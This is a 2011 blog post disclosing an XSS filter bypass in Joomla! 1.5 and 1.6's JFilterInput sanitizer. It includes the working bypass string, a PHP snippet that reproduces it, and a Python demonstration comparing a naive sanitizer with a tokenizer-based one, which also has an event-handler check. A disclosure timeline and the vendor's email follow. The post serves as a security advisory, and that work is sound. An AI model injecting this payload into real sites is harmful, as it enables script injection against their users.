Tuesday, 01 February 2011 09:21

Joomla! 1.5 and 1.6 rely on the JFilterInput class to sanitize user-supplied HTML. The class parses a given string for HTML, checks each element and attribute against a whitelist, and strips anything that is not allowed. Malformed HTML, however, can confuse that parsing so that the filter is bypassed and XSS code ends up in user-supplied input.

The following string bypasses JFilterInput's "safe" attributes in both 1.5 and 1.6:

<img src="<img src=x"/onerror=alert(1)//">

Users of 1.6 can test this by enabling the "Profile" user plugin and injecting this string into the "About Me" textarea. Joomla! 1.5 has no known core extensions that allow guests or regular users to post HTML; however, any third-party extension that relies on this class to sanitize input is vulnerable.
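
To make the failure mode concrete, here is an added example in Python (not code from this post, and not Joomla's code). `naive_clean` is a deliberately simplified model of a string-scanning sanitizer that, like the behaviour described above, treats a `<` found inside a tag as the start of a new tag and restarts there; `robust_clean` rebuilds the markup from a real tokenizer's view (Python's `html.parser`), where a `<` inside a quoted attribute value is just data. The tag and attribute whitelists, the scheme check on `src`/`href`, and the `event_handlers` detection helper are assumptions made for the demonstration. The bypass string is the one from this post; the control string is the author's "will be sanitized" case from the reproduction below.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed inputs: the bypass string from the post and the author's control
# case, which a string-scanning filter does catch.
BYPASS = '<img src="<img src=x"/onerror=alert(1)//">'
CONTROL = '<img src="x"/onerror=alert(1)//>'

# Assumed whitelists for the demonstration (not Joomla's lists).
ALLOWED_TAGS = {"img", "a", "b", "i", "p"}
ALLOWED_ATTRS = {"src", "alt", "href", "title"}

# Attribute scanner of the naive model: a quoted value or a run of non-space
# characters.  The unquoted branch swallows  x"/onerror=alert(1)//"  as one
# "value" of src, so onerror is never seen as an attribute at all.
_ATTR_RE = re.compile(r'(\w+)\s*=\s*("[^"]*"|\'[^\']*\'|\S+)')


def _rebuild_tag(body):
    """Naive model: keep a whitelisted tag and only its whitelisted attributes."""
    m = re.match(r"\s*(/?)(\w+)", body)
    if not m or m.group(2).lower() not in ALLOWED_TAGS:
        return ""
    closing, name = m.group(1), m.group(2).lower()
    if closing:
        return "</%s>" % name
    kept = [name]
    for attr, value in _ATTR_RE.findall(body[m.end():]):
        if attr.lower() in ALLOWED_ATTRS:
            kept.append('%s="%s"' % (attr.lower(), value.strip("'\"")))
    return "<%s>" % " ".join(kept)


def naive_clean(s):
    """Simplified model of a string-scanning sanitizer (not JFilterInput itself).

    It finds '<' ... '>' spans and rebuilds each as a tag.  If another '<'
    appears before the closing '>', everything up to that nested '<' is
    passed through as plain text and scanning restarts there.  On BYPASS that
    emits the literal text  <img src="  and then "sanitizes" the inner tag,
    whose onerror survives inside the swallowed src value.
    """
    out, i = [], 0
    while True:
        lt = s.find("<", i)
        gt = s.find(">", lt) if lt >= 0 else -1
        if lt < 0 or gt < 0:
            out.append(s[i:])
            return "".join(out)
        nested = s.find("<", lt + 1)
        if 0 <= nested < gt:
            out.append(s[i:nested])  # prefix passes through untouched
            i = nested
            continue
        out.append(s[i:lt])
        out.append(_rebuild_tag(s[lt + 1:gt]))
        i = gt + 1


class _Whitelist(HTMLParser):
    """Re-serialise markup from the tokenizer's view: to the tokenizer a '<'
    inside a quoted attribute value is data, never the start of a tag."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return
        parts = [tag]
        for name, value in attrs:
            if name not in ALLOWED_ATTRS or value is None:
                continue
            # Crude scheme check (assumption): drop src/href carrying any
            # scheme other than http(s), e.g. javascript: or data:.
            if name in ("src", "href") and ":" in value and \
                    not value.strip().lower().startswith(("http:", "https:")):
                continue
            parts.append('%s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s>" % " ".join(parts))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <img .../> needs no closing tag

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(escape(data))


def robust_clean(s):
    p = _Whitelist()
    p.feed(s)
    p.close()
    return "".join(p.out)


class _HandlerFinder(HTMLParser):
    """Detection helper: list the on* attributes a browser-like tokenizer sees."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        self.found.extend(n for n, _ in attrs if n.startswith("on"))


def event_handlers(s):
    f = _HandlerFinder()
    f.feed(s)
    f.close()
    return f.found


if __name__ == "__main__":
    for label, fn in (("naive", naive_clean), ("robust", robust_clean)):
        for s in (CONTROL, BYPASS):
            cleaned = fn(s)
            print("%-6s %-44s -> %s  handlers=%s"
                  % (label, s, cleaned, event_handlers(cleaned)))
```

Running the script shows the naive model stripping `onerror` from the control string but emitting `<img src="<img src="x"/onerror=alert(1)//">` for the bypass, which a tokenizer reads as an `img` with an `onerror` attribute; the tokenizer-based cleaner returns `<img src="&lt;img src=x">` for the same input. The `event_handlers` check is the kind of assertion worth running over a sanitizer's output in a regression suite, since it judges the result the way a browser will rather than by string matching.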

Timeline

  • Vulnerabilities Discovered: 15 January 2011
  • Vendor Notified: 15 January 2011
  • Vendor Response: 17 January 2011
  • Update Available: ...
  • Disclosure: 1 February 2011

Update

Since posting this, I've decided to go ahead and publish the email exchange... in all its brevity. Some headers removed.

-------- Original Message --------
Return-path:    <[e-mail address removed]>
Envelope-to:    [e-mail address removed]
Delivery-date:  Mon, 17 Jan 2011 19:40:17 -0600
Date:   Tue, 18 Jan 2011 01:40:26 +0000
Subject:        Re: [#XNT-28157-847] JFilterInput XSS Bypass
From:   Joomla! Security Strike Team (JSST) <[e-mail address removed]>
To:     [e-mail address removed]



Thank you for your email regarding a new vulnerability. We will investigate this as quickly as we can to verify and confirm the details. Once this is completed we will evaluate the complexity and criticality to determine the necessary resources and timing to correct the issue.

Please note: We may contact you for additional details, and/or advise you of the outcome of our investigation.

If this ticket XNT-28157-847 is not replied to within 7 days of Tue, 18 Jan 2011 01:40:20 +0000, it will be automatically closed.



On Sat, 15 Jan 2011 19:38:20 +0000, jeff <[e-mail address removed]> wrote:
>  The following string bypasses JFilterInput's "safe" attributes in both
>  1.5 and 1.6:
>
>  <img src="<img src=x"/onerror=alert(1)//">
>
>  Here's a quick way to reproduce: append the following somewhere in the
>  template:
>
>  <?php
>  $test = '<img src="x"/onerror=alert(1)//>'; // will be sanitized
>  $test .= '<img src="<img src=x"/onerror=alert(2)//">'; // will not be sanitized
>  $filter =& JFilterInput::getInstance(null, null, 1, 1);
>  echo $filter->clean($test);
>  ?>
>
>  The impact of this could be pretty wide, as any extension using this
>  method to sanitize user input is potentially vulnerable. One such
>  example is in 1.6 plg_user_profile "About Me" field.
>
>  TinyMCE will neuter this bypass if attempted in its html source editor
>  or by disabling via the ui button, but this is not a good remedy.

It was well over 7 days, so I guess I'm a jackass for assuming the ticket was closed?

Last Updated on Tuesday, 01 February 2011 19:02
 
Comments (2)
1 Sunday, 27 February 2011 07:31
Rahul Tyagi
That was really awesome, but I don't think that most people will make the best use of it. In India no one is going to update soon. So there is still a chance for hackers to search for the vulnerable, non-updated websites.
2 Thursday, 11 August 2011 15:36
Gogoman Jony
Thanks for the info....


The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.
